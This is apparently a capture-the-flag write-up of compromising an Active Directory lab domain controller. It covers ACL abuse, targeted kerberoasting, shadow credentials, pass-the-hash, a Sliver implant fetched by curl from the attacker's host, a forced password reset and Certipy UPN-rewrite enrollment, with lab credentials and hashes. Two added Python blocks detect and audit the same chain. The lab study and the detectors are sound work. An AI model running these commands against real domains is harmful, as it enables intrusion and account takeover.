## Summary

AD Domain Controller, assumed breach scenario.

---

## External Authenticated Access - `judith.mader`

`judith.mader:judith09`

- asreproast
- kerberoast

### Enumeration

#### Remote Services

```
# Nmap 7.93 scan initiated Wed Feb 12 21:27:54 2025 as: nmap -sV -sC --vv -oN remote-services-base.nmap 10.10.11.41
Nmap scan report for 10.10.11.41
Host is up, received echo-reply ttl 127 (0.042s latency).
Scanned at 2025-02-12 21:27:54 CET for 97s
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       REASON          VERSION
53/tcp   open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp   open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-02-13 03:28:11Z)
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-02-13T03:29:31+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Issuer: commonName=certified-DC01-CA/domainComponent=certified
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-13T15:49:36
| Not valid after:  2025-05-13T15:49:36
| MD5:   4e1f97f07c0ad0ec52e15f63ec55f3bc
| SHA-1: 28e24c68aa00dd8bee91564b33fea345116b3828
| -----BEGIN CERTIFICATE-----
...
|_-----END CERTIFICATE-----
445/tcp  open  microsoft-ds? syn-ack ttl 127
464/tcp  open  kpasswd5?     syn-ack ttl 127
593/tcp  open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Issuer: commonName=certified-DC01-CA/domainComponent=certified
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-13T15:49:36
| Not valid after:  2025-05-13T15:49:36
| MD5:   4e1f97f07c0ad0ec52e15f63ec55f3bc
| SHA-1: 28e24c68aa00dd8bee91564b33fea345116b3828
| -----BEGIN CERTIFICATE-----
...
|_-----END CERTIFICATE-----
|_ssl-date: 2025-02-13T03:29:32+00:00; +7h00m01s from scanner time.
3268/tcp open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-02-13T03:29:31+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Issuer: commonName=certified-DC01-CA/domainComponent=certified
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-13T15:49:36
| Not valid after:  2025-05-13T15:49:36
| MD5:   4e1f97f07c0ad0ec52e15f63ec55f3bc
| SHA-1: 28e24c68aa00dd8bee91564b33fea345116b3828
| -----BEGIN CERTIFICATE-----
...
|_-----END CERTIFICATE-----
3269/tcp open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Issuer: commonName=certified-DC01-CA/domainComponent=certified
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-13T15:49:36
| Not valid after:  2025-05-13T15:49:36
| MD5:   4e1f97f07c0ad0ec52e15f63ec55f3bc
| SHA-1: 28e24c68aa00dd8bee91564b33fea345116b3828
| -----BEGIN CERTIFICATE-----
...
|_-----END CERTIFICATE-----
|_ssl-date: 2025-02-13T03:29:32+00:00; +7h00m01s from scanner time.
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s
| smb2-time:
|   date: 2025-02-13T03:28:51
|_  start_date: N/A
| smb2-security-mode:
|   311:
|_    Message signing enabled and required
```

#### SMB

- no interesting shares
- may have a look at [[SMB Share - SYSVOL]]
  - doesn't contain anything but GptTmpl.inf files

#### winrm

- not permitted

### ldap

- can get a list of usernames
- nxc asreproast yields no love
  - neither does `GetNPUsers.py -request -dc-ip $RHOST -usersfile users.txt -format hashcat 'certified.htb/judith.mader:judith09'`
- password sprayed `user:user` - no love

#### Bloodhound

```sh
nxc ldap $RHOST -u $USER -p $PASS --bloodhound --collection All --dns-server $RHOST
```

Bloodhound works out and reveals:

1. A kerberoastable user: `management_svc`
2. A feasible attack vector for lateral movement

### Lateral Movement to `management_svc`

**Shortest Paths from Owned Objects:**

![[Pasted image 20250213215344.png]]

So the attack graph:

```
judith.mader@certified.htb --[WriteOwner]--> management@certified.htb --[GenericWrite]--> management_svc@certified.htb
```

We leverage the `WriteOwner` permission to take ownership of the `Management` group, the first step towards adding ourselves (`judith.mader`) to it:

```sh
owneredit.py -action write -new-owner 'judith.mader' -target 'Management' -debug certified.htb/judith.mader:judith09
```

Next, as the new owner, we'll grant ourselves the `AddMember` (`WriteMembers`) permission:

```sh
dacledit.py -action 'write' -rights 'WriteMembers' -principal 'judith.mader' -target 'Management' certified.htb/judith.mader:judith09
```

Which we'll leverage to add `judith.mader` as a member of `Management`:

```sh
net rpc group addmem "Management" "judith.mader" -U "certified.htb"/"judith.mader"%"judith09" -S "10.10.11.41"

# verify that we're indeed a part of the group
net rpc group members "Management" -U "certified.htb"/"judith.mader"%"judith09" -S "10.10.11.41"
# yields
# CERTIFIED\judith.mader
# CERTIFIED\management_svc
# (yaaay)
```

So we just became members of `management`, which has the `GenericWrite` permission on the `management_svc` user, which in turn allows us to perform two types of attacks:

- [[Kerberoasting]]
- [[AD Shadow Credentials - TODO]]

#### Targeted Kerberoast of `management_svc`

We'll attempt a targeted kerberoast:

```
./targetedKerberoast.py -u 'judith.mader' -p 'judith09' --request-user 'management_svc' -d 'certified.htb'
[*] Starting kerberoast attacks
[*] Attacking user (management_svc)
[+] Printing hash for (management_svc)
$krb5tgs$23$*management_svc$CERTIFIED.HTB$certified.htb/management_svc*$35051ae0ff38c1f3d80bd87cf772ef2b$...
```

noice, we got a #password-hash, now time for some #cracking :

```sh
john --wordlist=/home/noctua/arsenal/wordlists/rockyou.txt management_svc.hash
Using default input encoding: UTF-8
Loaded 1 password hash
(krb5tgs, Kerberos 5 TGS-REP etype 23 [MD4 HMAC-MD5 RC4])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
0g 0:00:00:05 DONE (2025-02-14 00:33) 0g/s 2512Kp/s 2512Kc/s 2512KC/s !)()45jlr..*7¡Vamos!
Session completed.
```

Password doesn't crack....

#### [[AD Shadow Credentials - TODO]] Attack

```
pywhisker -d "certified.htb" -u "judith.mader" -p "judith09" --target "management_svc" --action "add"
[*] Searching for the target account
[*] Target user found: CN=management service,CN=Users,DC=certified,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: a6b33665-94c7-ed5b-301c-1607ed694797
[*] Updating the msDS-KeyCredentialLink attribute of management_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: OifEQHse.pfx
[*] Must be used with password: YDBvy5KJYyHLdB17qQMo
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
```

then we'll obtain our TGT (Ticket-Granting Ticket):

```
╭─[λ]-[~/targets/certified/judith.mader]-[10.10.11.41]
╰─> gettgtpkinit certified.htb/management_svc -cert-pfx OifEQHse.pfx -pfx-pass YDBvy5KJYyHLdB17qQMo -dc-ip 10.10.11.41 management_svc.ccache
...
f6a71ad226ec7a900687169824f07ed744d157fc4ed333d88e02762cc8da9f36
...
```

aaaaand after that I'll exchange the TGT for an NT hash (via a U2U ticket to self that carries the PAC):

```sh
getnthash -key f6a71ad226ec7a900687169824f07ed744d157fc4ed333d88e02762cc8da9f36 certified.htb/management_svc
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
a091c1832bcdd4677c28b5a6a1295584
```

finally we'll leverage `management_svc`'s `Remote Management Users` group membership to PSRemote into the target system:

```sh
evil-winrm -i $RHOST -u management_svc -H a091c1832bcdd4677c28b5a6a1295584
```

---

## Internal Authenticated Access - `management_svc`

```
export USER=management_svc
export KRB5CCNAME=management_svc.ccache
export HASH=a091c1832bcdd4677c28b5a6a1295584
```

We're now authenticated as `management_svc`. Upon re-inspection of our #bloodhound graph we observe that `management_svc` has the `GenericAll` permission on `ca_operator` which, if I'm not mistaken, can be the last stepping stone towards reaching Domain Admin.

![[Pasted image 20250214175403.png]]

Now before I take any further steps, I would like to improve my system foothold by deploying a [[Sliver C2]] agent, which comes with a lot of pre-packaged AD tooling:

```sh
sliver > generate --os windows --http 10.10.14.7 --skip-symbols
[*] Implant saved to /home/noctua/targets/sauna/fsmith/THICK_ENERGY.exe
```

We download it to the target using:

```powershell
*Evil-WinRM* PS C:\Users\management_svc\Documents> curl http://10.10.14.7:8000/THICK_ENERGY.exe -o agent.exe
.\agent.exe
```

We're now locked and loaded to proceed with further lateral movement and privesc. The `GenericAll` permission leaves us with two attack vectors resulting in account takeover:

1. Force a password change - to a password of our choosing
2. Have another go with the [[AD Shadow Credentials - TODO]] attack.
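Every step of the chain so far (the `WriteOwner`/`WriteDAC` writes on the group, the membership add, the RC4 TGS request for the service account, the `msDS-KeyCredentialLink` write, and the forced password reset that follows) leaves a distinct record in the DC's Security log, and it is the combination of several of them from one principal that stands out. As an added example that is not part of this note or of any tool it uses, here is a small Python correlator run over constructed event records: the Event IDs, access-mask bits and field names are the real Windows ones, while the sample values and the sequence are assumptions modelled on the note.

```python
"""Correlate Security events for an AD object-control chain (added example,
constructed data). Field names follow the Windows Security log; values and the
sequence below are hypothetical and modelled on the note above."""
from collections import defaultdict

# ACCESS_MASK bits reported in Event ID 4662 (object access)
WRITE_DAC = 0x40000
WRITE_OWNER = 0x80000
ACCESS_WRITE_CONTROL = WRITE_DAC | WRITE_OWNER
GROUP_ADD_EVENTS = {4728, 4732, 4756}  # member added to global / local / universal security group
RC4_HMAC = 0x17                         # TicketEncryptionType in 4769 for etype 23

# Constructed sample events (hypothetical values) mirroring the note's chain plus benign noise
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "judith.mader",
     "ObjectName": "CN=Management,CN=Users,DC=certified,DC=htb", "AccessMask": WRITE_OWNER},
    {"EventID": 4662, "SubjectUserName": "judith.mader",
     "ObjectName": "CN=Management,CN=Users,DC=certified,DC=htb", "AccessMask": WRITE_DAC},
    {"EventID": 4728, "SubjectUserName": "judith.mader",
     "MemberName": "CN=judith.mader,CN=Users,DC=certified,DC=htb", "TargetUserName": "Management"},
    {"EventID": 4769, "TargetUserName": "judith.mader@CERTIFIED.HTB",
     "ServiceName": "management_svc", "TicketEncryptionType": RC4_HMAC},
    {"EventID": 5136, "SubjectUserName": "judith.mader",
     "ObjectDN": "CN=management service,CN=Users,DC=certified,DC=htb",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "Value Added"},
    {"EventID": 4724, "SubjectUserName": "management_svc", "TargetUserName": "ca_operator"},
    # benign: an AES ticket for the TGT service and a routine attribute edit by the helpdesk
    {"EventID": 4769, "TargetUserName": "alice@CERTIFIED.HTB", "ServiceName": "krbtgt",
     "TicketEncryptionType": 0x12},
    {"EventID": 5136, "SubjectUserName": "helpdesk", "ObjectDN": "CN=bob,CN=Users,DC=certified,DC=htb",
     "AttributeLDAPDisplayName": "telephoneNumber", "OperationType": "Value Added"},
]


def actor_of(event):
    """Normalise the acting principal to a bare, lowercase account name.
    4769 has no SubjectUserName; its requester is TargetUserName."""
    name = event.get("SubjectUserName") or event.get("TargetUserName") or ""
    return name.split("@")[0].lower()


def classify(event):
    """Map one Security event to a detection category, or None if it is benign."""
    eid = event["EventID"]
    if eid == 4662 and event.get("AccessMask", 0) & ACCESS_WRITE_CONTROL:
        return "object_control_write"          # WriteOwner / WriteDAC on an AD object
    if eid in GROUP_ADD_EVENTS:
        return "group_member_add"
    if eid == 4769 and event.get("TicketEncryptionType") == RC4_HMAC:
        svc = event.get("ServiceName", "")
        # machine accounts end in '$' and krbtgt is the TGT service; neither is a roastable user SPN
        if not svc.endswith("$") and svc.lower() != "krbtgt":
            return "rc4_tgs_request"
    if eid == 5136 and event.get("AttributeLDAPDisplayName", "").lower() == "msds-keycredentiallink":
        return "shadow_credential_write"
    if eid == 4724:
        return "password_reset"
    return None


def analyze(events):
    """Return (findings, suspicious_actors): every classified event, and the actors that
    hit two or more distinct categories (one category alone is often legitimate admin work)."""
    findings = []
    per_actor = defaultdict(set)
    for ev in events:
        cat = classify(ev)
        if cat is None:
            continue
        actor = actor_of(ev)
        target = (ev.get("ObjectName") or ev.get("ObjectDN")
                  or ev.get("ServiceName") or ev.get("TargetUserName"))
        findings.append({"event_id": ev["EventID"], "category": cat, "actor": actor, "target": target})
        per_actor[actor].add(cat)
    suspicious = {a: sorted(c) for a, c in per_actor.items() if len(c) >= 2}
    return findings, suspicious


if __name__ == "__main__":
    found, who = analyze(SAMPLE_EVENTS)
    for f in found:
        print(f"{f['event_id']}  {f['category']:<24} {f['actor']} -> {f['target']}")
    print("chained activity:", who)
```

Run on the constructed sample, `judith.mader` is the only principal spanning several categories, while the single `4724` from `management_svc` and the helpdesk's attribute edit stay below the threshold; on a real DC the same rules would be fed from the 4662/5136 events, which only exist if the object SACLs and directory-service-changes auditing are enabled.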
Given that forcing a password change is the lowest-hanging fruit, I'll give it the first go:

### Forced Password Change

```powershell
*Evil-WinRM* PS C:\Users\management_svc\Documents> net user ca_operator password123 /domain
The command completed successfully.
```

Let's verify the availability of the new account:

```sh
nxc smb $RHOST -u $USER -p $PASS
SMB         10.10.11.41     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.41     445    DC01             [+] certified.htb\ca_operator:password123
SMB         10.10.11.41     445    DC01             Node CA_OPERATOR@CERTIFIED.HTB successfully set as owned in BloodHound
```

Now the thing: `ca_operator` doesn't seem to have the `CanPSRemote` privilege, which is gonna force me to jump through a few more hoops:

```
psexec.py certified.htb/ca_operator:password123@10.10.11.41
# no writable shares

smbexec.py certified.htb/ca_operator:password123@10.10.11.41
# access denied

# local attempt
*Evil-WinRM* PS C:\Users\management_svc\Documents> .\RunasCs.exe ca_operator password123 "cmd /c whoami /all" --logon-type 3 --domain certified.htb
[*] Warning: User profile directory for user ca_operator does not exists. Use --force-profile if you want to force the creation.
[*] Warning: The function CreateProcessWithLogonW is not compatible with the requested logon type '3'. Reverting to the Interactive logon type '2'. To force a specific logon type, use the flag combination --remote-impersonation and --logon-type.
[-] RunasCsException: Selected logon type '2' is not granted to the user 'ca_operator'. Use available logon type '3'.
```

Got stuck here and decided to finally give up and have a look at a writeup.

```sh
# Perform shadow credentials attack??
certipy shadow auto -u management_svc@certified.htb -hashes $HASH -account ca_operator

certipy account update -u management_svc@certified.htb -hashes $HASH -user ca_operator -upn administrator
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_operator':
    userPrincipalName                   : administrator
[*] Successfully updated 'ca_operator'

certipy-ad req -username ca_operator@certified.htb -hashes $HASH -ca certified-DC01-CA -template CertifiedAuthentication
```

---

## Lessons Learned

- Targeted Kerberoasting
- How to exploit certain #AD-perm such as `WriteOwner`, `GenericAll`
- Got better at working with [[NetExec-TODO]], [[go-windapsearch]], [[BloodHound]] and [[Impacket]], as well as installing `pywhisker` and `targetedKerberoast`.
- [[AD Shadow Credentials - TODO]]
- Account takeover through forced password change

---

## Reference
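The last step of the note rewrites `ca_operator`'s `userPrincipalName` to `administrator` and then enrolls for a logon certificate. That only pays off when the issued certificate carries no SID security extension (the `CT_FLAG_NO_SECURITY_EXTENSION` bit in the template's `msPKI-Enrollment-Flag`) and the KDC still accepts UPN-only mapping, because the certificate is then matched to an account purely by the name in its SAN. The following Python audit, added here as an example and not Certipy's code nor the lab's real template data, checks exactly those three things against constructed records: templates that issue authentication-capable certificates without the security extension, accounts whose UPN no longer lines up with their `sAMAccountName` or realm, and the KDC's `StrongCertificateBindingEnforcement` value. The flag bit, the EKU OIDs and the registry semantics are real Microsoft values; the template names, flags and account records are made up for the demo.

```python
"""Audit helpers for the UPN-rewrite-then-enroll step (added example; constructed
template and account records, real Microsoft flag/OID constants)."""

# msPKI-Enrollment-Flag bit (MS-CRTD): certificates issued from the template omit the
# szOID_NTDS_CA_SECURITY_EXT SID extension, so only the SAN name binds them to an account
CT_FLAG_NO_SECURITY_EXTENSION = 0x00080000

# EKUs that make a certificate usable for AD logon
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}

# Constructed (hypothetical) template records; the 0x20 bit stands in for unrelated flags
SAMPLE_TEMPLATES = [
    {"name": "LegacyLogon", "msPKI-Enrollment-Flag": CT_FLAG_NO_SECURITY_EXTENSION | 0x20,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.4.1.311.20.2.2"]},
    {"name": "WebServer", "msPKI-Enrollment-Flag": CT_FLAG_NO_SECURITY_EXTENSION,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1"]},          # Server Auth only, not a logon cert
    {"name": "User", "msPKI-Enrollment-Flag": 0x29,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4"]},  # security extension kept
]

# Constructed account records; ca_operator's UPN is the rewritten value shown in the note
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "ca_operator", "userPrincipalName": "administrator"},
    {"sAMAccountName": "judith.mader", "userPrincipalName": "judith.mader@certified.htb"},
    {"sAMAccountName": "management_svc", "userPrincipalName": None},
]


def weak_auth_templates(templates):
    """Names of templates that can issue logon-capable certificates lacking the SID extension."""
    weak = []
    for t in templates:
        ekus = set(t.get("pKIExtendedKeyUsage") or [])
        auth_capable = not ekus or bool(ekus & AUTH_EKUS)  # an empty EKU list means all purposes
        if auth_capable and t["msPKI-Enrollment-Flag"] & CT_FLAG_NO_SECURITY_EXTENSION:
            weak.append(t["name"])
    return weak


def upn_anomalies(accounts, domain):
    """Accounts whose userPrincipalName does not line up with their sAMAccountName and realm."""
    out = []
    for acct in accounts:
        upn = acct.get("userPrincipalName")
        if not upn:
            continue  # UPN unset: nothing to cross-check
        local, sep, realm = upn.partition("@")
        reasons = []
        if not sep:
            reasons.append("no realm")
        elif realm.lower() != domain.lower():
            reasons.append("foreign realm")
        if local.lower() != acct["sAMAccountName"].lower():
            reasons.append("local part differs from sAMAccountName")
        if reasons:
            out.append({"sAMAccountName": acct["sAMAccountName"],
                        "userPrincipalName": upn, "reasons": reasons})
    return out


def kdc_binding_enforced(strong_binding_value):
    """StrongCertificateBindingEnforcement under HKLM\\SYSTEM\\CurrentControlSet\\Services\\Kdc:
    0 = disabled, 1 = compatibility mode, 2 = full enforcement (certificates without a SID
    binding are rejected for logon). Only 2 closes the UPN-only mapping path."""
    return strong_binding_value == 2


if __name__ == "__main__":
    print("templates issuing logon certs without SID extension:", weak_auth_templates(SAMPLE_TEMPLATES))
    for a in upn_anomalies(SAMPLE_ACCOUNTS, "certified.htb"):
        print(f"UPN anomaly on {a['sAMAccountName']}: {a['userPrincipalName']!r} ({', '.join(a['reasons'])})")
    print("KDC enforces strong binding:", kdc_binding_enforced(1))  # assumed registry value
```

In a live environment the template records come from `CN=Certificate Templates,CN=Public Key Services,CN=Services` in the Configuration naming context and the account records from a plain LDAP user query; the mitigations the three checks point at are clearing the no-security-extension flag on authentication templates, watching 5136 events for `userPrincipalName` changes, and moving the KDC to full enforcement.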